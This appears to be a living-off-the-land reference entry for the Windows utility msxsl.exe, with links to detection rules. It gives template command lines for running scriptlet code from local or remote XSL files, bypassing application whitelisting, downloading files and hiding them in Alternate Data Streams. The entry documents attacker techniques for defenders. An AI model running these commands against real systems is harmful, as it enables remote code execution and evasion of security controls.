msxsl.exe
Command line utility used to perform XSL transformations.
Paths
no default
Commands
Execute
Run COM Scriptlet code within the script.xsl file (local).
Use case: Local execution of script stored in XSL file.
Privileges: User
msxsl.exe {PATH:.xml} {PATH:.xsl}AWL Bypass
Run COM Scriptlet code within the script.xsl file (local).
Use case: Local execution of script stored in XSL file.
Privileges: User
msxsl.exe {PATH:.xml} {PATH:.xsl}Execute
Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).
Use case: Local execution of remote script stored in XSL script stored as an XML file.
Privileges: User
msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xsl}AWL Bypass
Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).
Use case: Local execution of remote script stored in XSL script stored as an XML file.
Privileges: User
msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xml}Download
Using remote XML and XSL files, save the transformed XML file to disk.
Use case: Download a file from the internet and save it to disk.
Privileges: User
msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xsl} -o {PATH}ADS
Using remote XML and XSL files, save the transformed XML file to an Alternate Data Stream (ADS).
Use case: Download a file from the internet and save it to an NTFS Alternate Data Stream.
Privileges: User
msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xsl} -o {PATH}:ads-nameDetection
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml
- Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_msxsl_beacon.toml
- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_msxsl_network.toml
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml